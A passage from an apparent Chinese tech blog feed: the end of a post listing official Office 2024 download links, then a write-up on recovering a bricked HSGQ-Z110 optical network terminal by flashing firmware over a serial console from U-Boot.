sans-serif; font-size: medium; text-wrap-mode: wrap; background-color: rgb(255, 255, 255);&quot;&gt;&lt;pre style=&quot;margin-top: 0px; margin-bottom: 0px; overflow-wrap: initial; background-color: rgb(248, 248, 250); border-radius: 4px; font-size: 0.9em; overflow: auto; padding: calc(0.888889em); word-break: initial;&quot;&gt;https://officecdn.microsoft.com/db/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/media/zh-cn/VisioPro2024Retail.img&lt;/pre&gt;&lt;/div&gt;&lt;h3 style=&quot;font-variant-numeric: inherit; font-variant-east-asian: inherit; font-variant-alternates: inherit; font-variant-position: inherit; font-variant-emoji: inherit; font-stretch: inherit; font-size: 1.1em; line-height: 1.5; font-family: -apple-system, BlinkMacSystemFont, &amp;quot;Helvetica Neue&amp;quot;, &amp;quot;PingFang SC&amp;quot;, &amp;quot;Microsoft YaHei&amp;quot;, &amp;quot;Source Han Sans SC&amp;quot;, &amp;quot;Noto Sans CJK SC&amp;quot;, &amp;quot;WenQuanYi Micro Hei&amp;quot;, sans-serif; font-optical-sizing: inherit; font-size-adjust: inherit; font-kerning: inherit; font-feature-settings: inherit; font-variation-settings: inherit; margin: calc(1.90909em) 0px calc(1.27273em); clear: left; color: rgb(25, 27, 31); text-wrap-mode: wrap; background-color: rgb(255, 255, 255);&quot;&gt;VisioStd2024&lt;/h3&gt;&lt;div class=&quot;highlight&quot; style=&quot;margin: 1em 0px; color: rgb(25, 27, 31); font-family: -apple-system, BlinkMacSystemFont, &amp;quot;Helvetica Neue&amp;quot;, &amp;quot;PingFang SC&amp;quot;, &amp;quot;Microsoft YaHei&amp;quot;, &amp;quot;Source Han Sans SC&amp;quot;, &amp;quot;Noto Sans CJK SC&amp;quot;, &amp;quot;WenQuanYi Micro Hei&amp;quot;, sans-serif; font-size: medium; text-wrap-mode: wrap; background-color: rgb(255, 255, 255);&quot;&gt;&lt;pre style=&quot;margin-top: 0px; margin-bottom: 0px; overflow-wrap: initial; background-color: rgb(248, 248, 250); border-radius: 4px; font-size: 0.9em; overflow: auto; padding: calc(0.888889em); word-break: initial;&quot;&gt;https://officecdn.microsoft.com/db/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/media/zh-cn/VisioStd2024Retail.img&lt;/pre&gt;&lt;/div&gt;&lt;h3 style=&quot;font-variant-numeric: inherit; font-variant-east-asian: inherit; font-variant-alternates: inherit; font-variant-position: inherit; font-variant-emoji: inherit; font-stretch: inherit; font-size: 1.1em; line-height: 1.5; font-family: -apple-system, BlinkMacSystemFont, &amp;quot;Helvetica Neue&amp;quot;, &amp;quot;PingFang SC&amp;quot;, &amp;quot;Microsoft YaHei&amp;quot;, &amp;quot;Source Han Sans SC&amp;quot;, &amp;quot;Noto Sans CJK SC&amp;quot;, &amp;quot;WenQuanYi Micro Hei&amp;quot;, sans-serif; font-optical-sizing: inherit; font-size-adjust: inherit; font-kerning: inherit; font-feature-settings: inherit; font-variation-settings: inherit; margin: calc(1.90909em) 0px calc(1.27273em); clear: left; color: rgb(25, 27, 31); text-wrap-mode: wrap; background-color: rgb(255, 255, 255);&quot;&gt;Word2024&lt;/h3&gt;&lt;div class=&quot;highlight&quot; style=&quot;margin: 1em 0px; color: rgb(25, 27, 31); font-family: -apple-system, BlinkMacSystemFont, &amp;quot;Helvetica Neue&amp;quot;, &amp;quot;PingFang SC&amp;quot;, &amp;quot;Microsoft YaHei&amp;quot;, &amp;quot;Source Han Sans SC&amp;quot;, &amp;quot;Noto Sans CJK SC&amp;quot;, &amp;quot;WenQuanYi Micro Hei&amp;quot;, sans-serif; font-size: medium; text-wrap-mode: wrap; background-color: rgb(255, 255, 255);&quot;&gt;&lt;pre style=&quot;margin-top: 0px; margin-bottom: 0px; overflow-wrap: initial; background-color: rgb(248, 248, 250); border-radius: 4px; font-size: 0.9em; overflow: auto; padding: calc(0.888889em); word-break: initial;&quot;&gt;https://officecdn.microsoft.com/db/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/media/zh-cn/Word2024Retail.img&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;&lt;span style=&quot;color: #191B1F; font-family: -apple-system, BlinkMacSystemFont, &amp;quot;Helvetica Neue&amp;quot;, &amp;quot;PingFang SC&amp;quot;, &amp;quot;Microsoft YaHei&amp;quot;, &amp;quot;Source Han Sans SC&amp;quot;, &amp;quot;Noto Sans CJK SC&amp;quot;, &amp;quot;WenQuanYi Micro Hei&amp;quot;, sans-serif; font-size: medium; text-wrap-mode: wrap; background-color: #FFFFFF;&quot;&gt;&lt;/span&gt;&lt;/p&gt;&lt;h2 style=&quot;font-variant-numeric: inherit; font-variant-east-asian: inherit; font-variant-alternates: inherit; font-variant-position: inherit; font-variant-emoji: inherit; font-stretch: inherit; font-size: 1.2em; line-height: 1.5; font-family: -apple-system, BlinkMacSystemFont, &amp;quot;Helvetica Neue&amp;quot;, &amp;quot;PingFang SC&amp;quot;, &amp;quot;Microsoft YaHei&amp;quot;, &amp;quot;Source Han Sans SC&amp;quot;, &amp;quot;Noto Sans CJK SC&amp;quot;, &amp;quot;WenQuanYi Micro Hei&amp;quot;, sans-serif; font-optical-sizing: inherit; font-size-adjust: inherit; font-kerning: inherit; font-feature-settings: inherit; font-variation-settings: inherit; margin: calc(2.33333em) 0px calc(1.16667em); clear: left; color: rgb(25, 27, 31); text-wrap-mode: wrap; background-color: rgb(255, 255, 255);&quot;&gt;3.批量版安装包下载&lt;/h2&gt;&lt;p data-pid=&quot;1ZtJnn01&quot; style=&quot;margin-top: 1.4em; margin-bottom: 1.4em; color: rgb(25, 27, 31); font-family: -apple-system, BlinkMacSystemFont, &amp;quot;Helvetica Neue&amp;quot;, &amp;quot;PingFang SC&amp;quot;, &amp;quot;Microsoft YaHei&amp;quot;, &amp;quot;Source Han Sans SC&amp;quot;, &amp;quot;Noto Sans CJK SC&amp;quot;, &amp;quot;WenQuanYi Micro Hei&amp;quot;, sans-serif; font-size: medium; text-wrap-mode: wrap; background-color: rgb(255, 255, 255);&quot;&gt;在2016及之前的版本中，批量版指的是&lt;a class=&quot;RichContent-EntityWord css-b7erz1&quot; data-za-not-track-link=&quot;true&quot; data-paste-text=&quot;true&quot; href=&quot;https://zhida.zhihu.com/search?content_id=248819099&amp;content_type=Article&amp;match_order=1&amp;q=VOL%E7%89%88&amp;zhida_source=entity&quot; target=&quot;_blank&quot; style=&quot;color: rgb(9, 64, 142); cursor: pointer;&quot;&gt;VOL版&lt;svg width=&quot;10px&quot; height=&quot;10px&quot; viewbox=&quot;0 0 16 16&quot; class=&quot;ZDI ZDI--FourPointedStar16 css-1dvsrp&quot; fill=&quot;currentColor&quot;&gt;&lt;path d=&quot;m5.068 9.267-3.08-.77a.512.512 0 0 1 0-.994l3.08-.77a2.289 2.289 0 0 0 1.665-1.665l.77-3.08a.512.512 0 0 1 .994 0l.77 3.08c.205.82.845 1.46 1.665 1.665l3.08.77a.512.512 0 0 1 0 .994l-3.08.77a2.29 2.29 0 0 0-1.665 1.665l-.77 3.08a.512.512 0 0 1-.994 0l-.77-3.08a2.289 2.289 0 0 0-1.665-1.665Z&quot;&gt;&lt;/path&gt;&lt;/svg&gt;&lt;/a&gt;。而从2019开始，批量版指的是&lt;a class=&quot;RichContent-EntityWord css-b7erz1&quot; data-za-not-track-link=&quot;true&quot; data-paste-text=&quot;true&quot; href=&quot;https://zhida.zhihu.com/search?content_id=248819099&amp;content_type=Article&amp;match_order=1&amp;q=LTSC%E7%89%88&amp;zhida_source=entity&quot; target=&quot;_blank&quot; style=&quot;color: rgb(9, 64, 142); cursor: pointer;&quot;&gt;LTSC版&lt;svg width=&quot;10px&quot; height=&quot;10px&quot; viewbox=&quot;0 0 16 16&quot; class=&quot;ZDI ZDI--FourPointedStar16 css-1dvsrp&quot; fill=&quot;currentColor&quot;&gt;&lt;path d=&quot;m5.068 9.267-3.08-.77a.512.512 0 0 1 0-.994l3.08-.77a2.289 2.289 0 0 0 1.665-1.665l.77-3.08a.512.512 0 0 1 .994 0l.77 3.08c.205.82.845 1.46 1.665 1.665l3.08.77a.512.512 0 0 1 0 .994l-3.08.77a2.29 2.29 0 0 0-1.665 1.665l-.77 3.08a.512.512 0 0 1-.994 0l-.77-3.08a2.289 2.289 0 0 0-1.665-1.665Z&quot;&gt;&lt;/path&gt;&lt;/svg&gt;&lt;/a&gt;（长期服务通道），这个版本微软提供5年的支持。并且从2024开始零售版的许可证也带有LTSC字样，说明Office 2024零售版，也是一次性购买即可获得5年的支持。&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;color: #191B1F; font-family: -apple-system, BlinkMacSystemFont, &amp;quot;Helvetica Neue&amp;quot;, &amp;quot;PingFang SC&amp;quot;, &amp;quot;Microsoft YaHei&amp;quot;, &amp;quot;Source Han Sans SC&amp;quot;, &amp;quot;Noto Sans CJK SC&amp;quot;, &amp;quot;WenQuanYi Micro Hei&amp;quot;, sans-serif; font-size: medium; text-wrap-mode: wrap; background-color: #FFFFFF;&quot;&gt;&lt;br/&gt;&lt;/span&gt;&lt;img data-width=&quot;535&quot; data-height=&quot;623&quot; src=&quot;https://www.qxhut.cn/zb_users/upload/2025/02/202502171739777539553690.png&quot; alt=&quot;1739777537907.png&quot;/&gt;&lt;/p&gt;&lt;p data-pid=&quot;z27wfERZ&quot; style=&quot;margin-top: 1.4em; margin-bottom: 1.4em; color: rgb(25, 27, 31); font-family: -apple-system, BlinkMacSystemFont, &amp;quot;Helvetica Neue&amp;quot;, &amp;quot;PingFang SC&amp;quot;, &amp;quot;Microsoft YaHei&amp;quot;, &amp;quot;Source Han Sans SC&amp;quot;, &amp;quot;Noto Sans CJK SC&amp;quot;, &amp;quot;WenQuanYi Micro Hei&amp;quot;, sans-serif; font-size: medium; text-wrap-mode: wrap; background-color: rgb(255, 255, 255);&quot;&gt;不过从从Office 2019开始，微软不再直接提供批量版安装包的下载镜像。&lt;/p&gt;&lt;p data-pid=&quot;LsvGBeJa&quot; style=&quot;margin-top: 1.4em; margin-bottom: 1.4em; color: rgb(25, 27, 31); font-family: -apple-system, BlinkMacSystemFont, &amp;quot;Helvetica Neue&amp;quot;, &amp;quot;PingFang SC&amp;quot;, &amp;quot;Microsoft YaHei&amp;quot;, &amp;quot;Source Han Sans SC&amp;quot;, &amp;quot;Noto Sans CJK SC&amp;quot;, &amp;quot;WenQuanYi Micro Hei&amp;quot;, sans-serif; font-size: medium; text-wrap-mode: wrap; background-color: rgb(255, 255, 255);&quot;&gt;而是需要使用微软官方工具&lt;a href=&quot;https://zhuanlan.zhihu.com/p/789653893&quot; class=&quot;internal&quot; target=&quot;_blank&quot; data-za-detail-view-id=&quot;1043&quot; style=&quot;color: inherit; border-bottom: 1px solid rgb(129, 133, 143); cursor: pointer;&quot;&gt;ODT&lt;/a&gt;在线下载、安装和部署。&lt;/p&gt;&lt;p data-pid=&quot;j24XteYG&quot; style=&quot;margin-top: 1.4em; margin-bottom: 1.4em; color: rgb(25, 27, 31); font-family: -apple-system, BlinkMacSystemFont, &amp;quot;Helvetica Neue&amp;quot;, &amp;quot;PingFang SC&amp;quot;, &amp;quot;Microsoft YaHei&amp;quot;, &amp;quot;Source Han Sans SC&amp;quot;, &amp;quot;Noto Sans CJK SC&amp;quot;, &amp;quot;WenQuanYi Micro Hei&amp;quot;, sans-serif; font-size: medium; text-wrap-mode: wrap; background-color: rgb(255, 255, 255);&quot;&gt;详细步骤方法，可以参阅微软官方介绍，&lt;/p&gt;&lt;div class=&quot;highlight&quot; style=&quot;margin: 1em 0px; color: rgb(25, 27, 31); font-family: -apple-system, BlinkMacSystemFont, &amp;quot;Helvetica Neue&amp;quot;, &amp;quot;PingFang SC&amp;quot;, &amp;quot;Microsoft YaHei&amp;quot;, &amp;quot;Source Han Sans SC&amp;quot;, &amp;quot;Noto Sans CJK SC&amp;quot;, &amp;quot;WenQuanYi Micro Hei&amp;quot;, sans-serif; font-size: medium; text-wrap-mode: wrap; background-color: rgb(255, 255, 255);&quot;&gt;&lt;pre style=&quot;margin-top: 0px; margin-bottom: 0px; overflow-wrap: initial; background-color: rgb(248, 248, 250); border-radius: 4px; font-size: 0.9em; overflow: auto; padding: calc(0.888889em); word-break: initial;&quot;&gt;https://learn.microsoft.com/zh-cn/office/ltsc/2024/deploy&lt;/pre&gt;&lt;/div&gt;&lt;p data-pid=&quot;lt5v4UEs&quot; style=&quot;margin-top: 1.4em; margin-bottom: 0px; color: rgb(25, 27, 31); font-family: -apple-system, BlinkMacSystemFont, &amp;quot;Helvetica Neue&amp;quot;, &amp;quot;PingFang SC&amp;quot;, &amp;quot;Microsoft YaHei&amp;quot;, &amp;quot;Source Han Sans SC&amp;quot;, &amp;quot;Noto Sans CJK SC&amp;quot;, &amp;quot;WenQuanYi Micro Hei&amp;quot;, sans-serif; font-size: medium; text-wrap-mode: wrap; background-color: rgb(255, 255, 255);&quot;&gt;结论 随着我们迎来Microsoft Office 2024时代，很明显这家科技巨头继续将创新和用户为中心的设计置于优先位置。更新的界面、增强的协作工具、人工智能集成和跨平台兼容性使这个版本成为追求动态和高效办公套件的人士必备。无论您是经验丰富的专业人士还是开始项目的学生，它为数字生产力设定了新的标准。&lt;/p&gt;&lt;p&gt;&lt;br/&gt;&lt;/p&gt;</description><pubDate>Mon, 17 Feb 2025 15:25:08 +0800</pubDate></item><item><title>通用型2.5G光猫鸿升光 HSGQ-Z110 刷错固件救援</title><link>https://www.qxhut.cn/?id=46</link><description>&lt;div style=&quot;margin: 0px; padding: 0px; overflow-wrap: break-word;&quot;&gt;如图设备 ，在刷估计过程中错刷某猫棒的固件，导致 不能进界面，开机只有电源灯亮，百度搜索也没好的教程&lt;/div&gt;&lt;p style=&quot;margin-top: 0px; margin-bottom: 0px; padding: 0px; overflow-wrap: break-word;&quot;&gt;&lt;img data-width=&quot;564&quot; data-height=&quot;377&quot; src=&quot;https://www.qxhut.cn/zb_users/upload/2025/02/202502111739266977233210.jpg&quot; alt=&quot;1739266973301.jpg&quot;/&gt;&lt;/p&gt;&lt;p style=&quot;margin: 0px; padding: 0px; overflow-wrap: break-word;&quot;&gt;于是开启了个人的折腾研究，凭借嵌入式测试工作的经验，遇到设备先拆机，拆开发现有串口&lt;/p&gt;&lt;p style=&quot;margin: 0px; padding: 0px; overflow-wrap: break-word;&quot;&gt;&lt;img data-width=&quot;535&quot; data-height=&quot;344&quot; src=&quot;https://www.qxhut.cn/zb_users/upload/2025/02/202502111739267088651465.jpg&quot; alt=&quot;1739267085437.jpg&quot;/&gt;&lt;/p&gt;&lt;div style=&quot;margin: 0px; padding: 0px; overflow-wrap: break-word;&quot;&gt;如图位置，分别为TX GND RX VCC 果断接上 CH341 串口 波特率115200&lt;/div&gt;&lt;div style=&quot;margin: 0px; padding: 0px; overflow-wrap: break-word;&quot;&gt;发现竟然 有反应 还进入系统了 ，但是 发现网卡没通，也没法 tftp 传文件进去，此路不通&lt;/div&gt;&lt;p style=&quot;margin: 0px; padding: 0px; overflow-wrap: break-word;&quot;&gt;那开机进u-boot 试试，在倒计时结束前 任意键进入，如图，已经成功进入&lt;/p&gt;&lt;p style=&quot;margin: 0px; padding: 0px; overflow-wrap: break-word;&quot;&gt;&lt;img data-width=&quot;849&quot; data-height=&quot;855&quot; src=&quot;https://www.qxhut.cn/zb_users/upload/2025/02/202502111739267122564444.jpg&quot; alt=&quot;1739267115153.jpg&quot;/&gt;&lt;/p&gt;&lt;div style=&quot;margin: 0px; padding: 0px; overflow-wrap: break-word;&quot;&gt;执行help 发现有 run yk 和 yr 好东西啊 ，于是按照以往的经验 进行串口传输文件烧写(串口传输巨慢，耐心等待完成即可)&lt;/div&gt;&lt;div style=&quot;margin: 0px; padding: 0px; overflow-wrap: break-word;&quot;&gt;&lt;ol style=&quot;margin-top: 1em; margin-bottom: 1em; padding: 0px 0px 0px 1.5em; overflow-wrap: break-word; box-sizing: border-box; -webkit-tap-highlight-color: transparent;&quot; class=&quot; list-paddingleft-2&quot;&gt;&lt;li&gt;&lt;h4 style=&quot;margin: 1em 0px; padding: 0px; overflow-wrap: break-word; font-family: -apple-system, BlinkMacSystemFont, &amp;quot;Segoe UI&amp;quot;, Roboto, Oxygen, Ubuntu, Cantarell, &amp;quot;Open Sans&amp;quot;, &amp;quot;Helvetica Neue&amp;quot;, sans-serif; box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-size: 1em;&quot;&gt;&lt;strong style=&quot;margin: 0px; padding: 0px; overflow-wrap: break-word; box-sizing: border-box; -webkit-tap-highlight-color: transparent;&quot;&gt;1. 刷写内核 (uImage)&lt;/strong&gt;&lt;/h4&gt;&lt;pre style=&quot;margin-top: 1.5em; margin-bottom: 1.5em; padding: 0px; overflow-wrap: break-word; font-family: &amp;quot;Fira Code&amp;quot;, &amp;quot;Courier New&amp;quot;, Courier, monospace; box-sizing: border-box; -webkit-tap-highlight-color: transparent; border-radius: 5px; overflow-x: auto; background-color: var(--color-background-mute);&quot;&gt;&amp;lt;BASH&amp;gt;run&amp;nbsp;yk&amp;nbsp;&amp;nbsp;#&amp;nbsp;触发YMODEM传输，选择发送uImage文件&lt;/pre&gt;&lt;/li&gt;&lt;ul style=&quot;list-style-type: initial;&quot; class=&quot; list-paddingleft-2&quot;&gt;&lt;li&gt;&lt;p&gt;执行命令后，终端会提示发送文件，选择本地的&amp;nbsp;&lt;code style=&quot;margin: 0px; padding: 3px 5px; overflow-wrap: break-word; box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: &amp;quot;Cascadia Code&amp;quot;, &amp;quot;Fira Code&amp;quot;, Consolas, monospace; background-image: ; background-position-x: ; background-position-y: ; background-size: ; background-repeat: ; background-attachment: ; background-origin: ; background-clip: ; border-radius: 5px; word-break: keep-all; white-space-collapse: preserve;&quot;&gt;uImage&lt;/code&gt;&amp;nbsp;文件。&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;等待传输完成，U-Boot会自动校验并写入&amp;nbsp;&lt;code style=&quot;margin: 0px; padding: 3px 5px; overflow-wrap: break-word; box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: &amp;quot;Cascadia Code&amp;quot;, &amp;quot;Fira Code&amp;quot;, Consolas, monospace; background-image: ; background-position-x: ; background-position-y: ; background-size: ; background-repeat: ; background-attachment: ; background-origin: ; background-clip: ; border-radius: 5px; word-break: keep-all; white-space-collapse: preserve;&quot;&gt;k0&lt;/code&gt;&amp;nbsp;分区（地址&amp;nbsp;&lt;code style=&quot;margin: 0px; padding: 3px 5px; overflow-wrap: break-word; box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: &amp;quot;Cascadia Code&amp;quot;, &amp;quot;Fira Code&amp;quot;, Consolas, monospace; background-image: ; background-position-x: ; background-position-y: ; background-size: ; background-repeat: ; background-attachment: ; background-origin: ; background-clip: ; border-radius: 5px; word-break: keep-all; white-space-collapse: preserve;&quot;&gt;0x80000&lt;/code&gt;）。&lt;/p&gt;&lt;p&gt;&lt;img data-width=&quot;591&quot; data-height=&quot;171&quot; src=&quot;https://www.qxhut.cn/zb_users/upload/2025/02/202502111739267140260881.jpg&quot; alt=&quot;1739267130938.jpg&quot;/&gt;&lt;br/&gt;&lt;/p&gt;&lt;/li&gt;&lt;/ul&gt;&lt;/ol&gt;&lt;ol style=&quot;margin-top: 1em; margin-bottom: 1em; padding: 0px 0px 0px 1.5em; overflow-wrap: break-word; box-sizing: border-box; -webkit-tap-highlight-color: transparent;&quot; class=&quot; list-paddingleft-2&quot;&gt;&lt;li&gt;&lt;h4 style=&quot;margin: 1em 0px; padding: 0px; overflow-wrap: break-word; font-family: -apple-system, BlinkMacSystemFont, &amp;quot;Segoe UI&amp;quot;, Roboto, Oxygen, Ubuntu, Cantarell, &amp;quot;Open Sans&amp;quot;, &amp;quot;Helvetica Neue&amp;quot;, sans-serif; box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-size: 1em;&quot;&gt;&lt;strong style=&quot;margin: 0px; padding: 0px; overflow-wrap: break-word; box-sizing: border-box; -webkit-tap-highlight-color: transparent;&quot;&gt;2. 刷写根文件系统 (rootfs)&lt;/strong&gt;&lt;/h4&gt;&lt;pre style=&quot;margin-top: 1.5em; margin-bottom: 1.5em; padding: 0px; overflow-wrap: break-word; font-family: &amp;quot;Fira Code&amp;quot;, &amp;quot;Courier New&amp;quot;, Courier, monospace; box-sizing: border-box; -webkit-tap-highlight-color: transparent; border-radius: 5px; overflow-x: auto; background-color: var(--color-background-mute);&quot;&gt;&amp;lt;BASH&amp;gt;run&amp;nbsp;yr&amp;nbsp;&amp;nbsp;#&amp;nbsp;触发YMODEM传输，选择发送rootfs文件&lt;/pre&gt;&lt;/li&gt;&lt;ul style=&quot;list-style-type: initial;&quot; class=&quot; list-paddingleft-2&quot;&gt;&lt;li&gt;&lt;p&gt;同样选择本地的&amp;nbsp;&lt;code style=&quot;margin: 0px; padding: 3px 5px; overflow-wrap: break-word; box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: &amp;quot;Cascadia Code&amp;quot;, &amp;quot;Fira Code&amp;quot;, Consolas, monospace; background-image: ; background-position-x: ; background-position-y: ; background-size: ; background-repeat: ; background-attachment: ; background-origin: ; background-clip: ; border-radius: 5px; word-break: keep-all; white-space-collapse: preserve;&quot;&gt;rootfs&lt;/code&gt;&amp;nbsp;文件，传输完成后自动写入&amp;nbsp;&lt;code style=&quot;margin: 0px; padding: 3px 5px; overflow-wrap: break-word; box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: &amp;quot;Cascadia Code&amp;quot;, &amp;quot;Fira Code&amp;quot;, Consolas, monospace; background-image: ; background-position-x: ; background-position-y: ; background-size: ; background-repeat: ; background-attachment: ; background-origin: ; background-clip: ; border-radius: 5px; word-break: keep-all; white-space-collapse: preserve;&quot;&gt;r0&lt;/code&gt;&amp;nbsp;分区（地址&amp;nbsp;&lt;code style=&quot;margin: 0px; padding: 3px 5px; overflow-wrap: break-word; box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: &amp;quot;Cascadia Code&amp;quot;, &amp;quot;Fira Code&amp;quot;, Consolas, monospace; background-image: ; background-position-x: ; background-position-y: ; background-size: ; background-repeat: ; background-attachment: ; background-origin: ; background-clip: ; border-radius: 5px; word-break: keep-all; white-space-collapse: preserve;&quot;&gt;0x380000&lt;/code&gt;）。&lt;/p&gt;&lt;p&gt;&lt;img data-width=&quot;628&quot; data-height=&quot;187&quot; src=&quot;https://www.qxhut.cn/zb_users/upload/2025/02/202502111739267156636328.jpg&quot; alt=&quot;1739267149465.jpg&quot;/&gt;&lt;br/&gt;&lt;/p&gt;&lt;/li&gt;&lt;/ul&gt;&lt;li&gt;&lt;p style=&quot;margin-top: 0px; padding: 0px; overflow-wrap: break-word; box-sizing: border-box; -webkit-tap-highlight-color: transparent; white-space-collapse: preserve;&quot;&gt;&lt;strong style=&quot;margin: 0px; padding: 0px; overflow-wrap: break-word; box-sizing: border-box; -webkit-tap-highlight-color: transparent;&quot;&gt;更新版本信息（可选）&lt;/strong&gt;&lt;/p&gt;&lt;pre style=&quot;margin-top: 1.5em; margin-bottom: 1.5em; padding: 0px; overflow-wrap: break-word; box-sizing: border-box; -webkit-tap-highlight-color: transparent; border-radius: 5px; overflow-x: auto; font-family: &amp;quot;Fira Code&amp;quot;, &amp;quot;Courier New&amp;quot;, Courier, monospace; background-color: var(--color-background-mute);&quot;&gt;&amp;lt;BASH&amp;gt;setenv&amp;nbsp;sw_version0&amp;nbsp;$(cat&amp;nbsp;fwu_ver)&amp;nbsp;&amp;nbsp;#&amp;nbsp;从fwu_ver读取版本号saveenv&amp;nbsp;&amp;nbsp;#&amp;nbsp;保存环境变量&lt;/pre&gt;&lt;/li&gt;&lt;ul style=&quot;list-style-type: initial;&quot; class=&quot; list-paddingleft-2&quot;&gt;&lt;li&gt;&lt;p&gt;如果需更新固件版本号，手动设置环境变量：&lt;/p&gt;&lt;/li&gt;&lt;/ul&gt;&lt;li&gt;&lt;p style=&quot;margin-top: 0px; padding: 0px; overflow-wrap: break-word; box-sizing: border-box; -webkit-tap-highlight-color: transparent; white-space-collapse: preserve;&quot;&gt;&lt;strong style=&quot;margin: 0px; padding: 0px; overflow-wrap: break-word; box-sizing: border-box; -webkit-tap-highlight-color: transparent;&quot;&gt;切换启动分区（如需）&lt;/strong&gt;&lt;/p&gt;&lt;pre style=&quot;margin-top: 1.5em; margin-bottom: 1.5em; padding: 0px; overflow-wrap: break-word; box-sizing: border-box; -webkit-tap-highlight-color: transparent; border-radius: 5px; overflow-x: auto; font-family: &amp;quot;Fira Code&amp;quot;, &amp;quot;Courier New&amp;quot;, Courier, monospace; background-color: var(--color-background-mute);&quot;&gt;&amp;lt;BASH&amp;gt;setenv&amp;nbsp;sw_active&amp;nbsp;1saveenv&lt;/pre&gt;&lt;/li&gt;&lt;ul style=&quot;list-style-type: initial;&quot; class=&quot; list-paddingleft-2&quot;&gt;&lt;li&gt;&lt;p&gt;默认从镜像0（&lt;code style=&quot;margin: 0px; padding: 3px 5px; overflow-wrap: break-word; box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: &amp;quot;Cascadia Code&amp;quot;, &amp;quot;Fira Code&amp;quot;, Consolas, monospace; background-image: ; background-position-x: ; background-position-y: ; background-size: ; background-repeat: ; background-attachment: ; background-origin: ; background-clip: ; border-radius: 5px; word-break: keep-all; white-space-collapse: preserve;&quot;&gt;k0/r0&lt;/code&gt;）启动，若需切换到镜像1（&lt;code style=&quot;margin: 0px; padding: 3px 5px; overflow-wrap: break-word; box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: &amp;quot;Cascadia Code&amp;quot;, &amp;quot;Fira Code&amp;quot;, Consolas, monospace; background-image: ; background-position-x: ; background-position-y: ; background-size: ; background-repeat: ; background-attachment: ; background-origin: ; background-clip: ; border-radius: 5px; word-break: keep-all; white-space-collapse: preserve;&quot;&gt;k1/r1&lt;/code&gt;）：&lt;/p&gt;&lt;/li&gt;&lt;/ul&gt;&lt;li&gt;&lt;p style=&quot;margin-top: 0px; padding: 0px; overflow-wrap: break-word; box-sizing: border-box; -webkit-tap-highlight-color: transparent; white-space-collapse: preserve;&quot;&gt;&lt;strong style=&quot;margin: 0px; padding: 0px; overflow-wrap: break-word; box-sizing: border-box; -webkit-tap-highlight-color: transparent;&quot;&gt;重启设备&lt;/strong&gt;&lt;/p&gt;&lt;pre style=&quot;margin-top: 1.5em; margin-bottom: 1.5em; padding: 0px; overflow-wrap: break-word; box-sizing: border-box; -webkit-tap-highlight-color: transparent; border-radius: 5px; overflow-x: auto; font-family: &amp;quot;Fira Code&amp;quot;, &amp;quot;Courier New&amp;quot;, Courier, monospace; background-color: var(--color-background-mute);&quot;&gt;&amp;lt;BASH&amp;gt;reset&lt;/pre&gt;&lt;p&gt;&lt;img data-width=&quot;808&quot; data-height=&quot;278&quot; src=&quot;https://www.qxhut.cn/zb_users/upload/2025/02/202502111739267176875556.jpg&quot; alt=&quot;1739267172304.jpg&quot;/&gt;&lt;br/&gt;&lt;/p&gt;&lt;/li&gt;&lt;/ol&gt;&lt;ol style=&quot;margin-top: 1em; margin-bottom: 1em; padding: 0px 0px 0px 1.5em; overflow-wrap: break-word; box-sizing: border-box; -webkit-tap-highlight-color: transparent;&quot; class=&quot; list-paddingleft-2&quot;&gt;&lt;/ol&gt;&lt;hr style=&quot;margin: 20px 0px; padding: 0px; overflow-wrap: break-word; box-sizing: border-box; -webkit-tap-highlight-color: transparent; border-right: none; border-bottom: none; border-left: none; border-image: initial; border-top: 0.5px solid var(--color-border); font-family: Ubuntu, -apple-system, BlinkMacSystemFont, &amp;quot;Segoe UI&amp;quot;, Roboto, Oxygen, Cantarell, &amp;quot;Open Sans&amp;quot;, &amp;quot;Helvetica Neue&amp;quot;, sans-serif;&quot;/&gt;&lt;h3 style=&quot;margin: 1em 0px; padding: 0px; overflow-wrap: break-word; box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: -apple-system, BlinkMacSystemFont, &amp;quot;Segoe UI&amp;quot;, Roboto, Oxygen, Ubuntu, Cantarell, &amp;quot;Open Sans&amp;quot;, &amp;quot;Helvetica Neue&amp;quot;, sans-serif; font-size: 1.2em;&quot;&gt;&lt;strong style=&quot;margin: 0px; padding: 0px; overflow-wrap: break-word; box-sizing: border-box; -webkit-tap-highlight-color: transparent;&quot;&gt;三、关键命令说明&lt;/strong&gt;&lt;/h3&gt;&lt;ul style=&quot;list-style-type: initial;&quot; class=&quot; list-paddingleft-2&quot;&gt;&lt;li&gt;&lt;p style=&quot;margin-top: 0px; padding: 0px; overflow-wrap: break-word; box-sizing: border-box; -webkit-tap-highlight-color: transparent; white-space-collapse: preserve;&quot;&gt;&lt;strong style=&quot;margin: 0px; padding: 0px; overflow-wrap: break-word; box-sizing: border-box; -webkit-tap-highlight-color: transparent;&quot;&gt;&lt;code style=&quot;margin: 0px; padding: 3px 5px; overflow-wrap: break-word; box-sizing: border-box; font-weight: normal; -webkit-tap-highlight-color: transparent; font-family: &amp;quot;Cascadia Code&amp;quot;, &amp;quot;Fira Code&amp;quot;, Consolas, monospace; background-image: ; background-position-x: ; background-position-y: ; background-size: ; background-repeat: ; background-attachment: ; background-origin: ; background-clip: ; border-radius: 5px; word-break: keep-all;&quot;&gt;run yk&lt;/code&gt;&lt;/strong&gt;&lt;/p&gt;&lt;/li&gt;&lt;ul style=&quot;list-style-type: circle;&quot; class=&quot; list-paddingleft-2&quot;&gt;&lt;li&gt;&lt;p&gt;流程：通过YMODEM接收&amp;nbsp;&lt;code style=&quot;margin: 0px; padding: 3px 5px; overflow-wrap: break-word; box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: &amp;quot;Cascadia Code&amp;quot;, 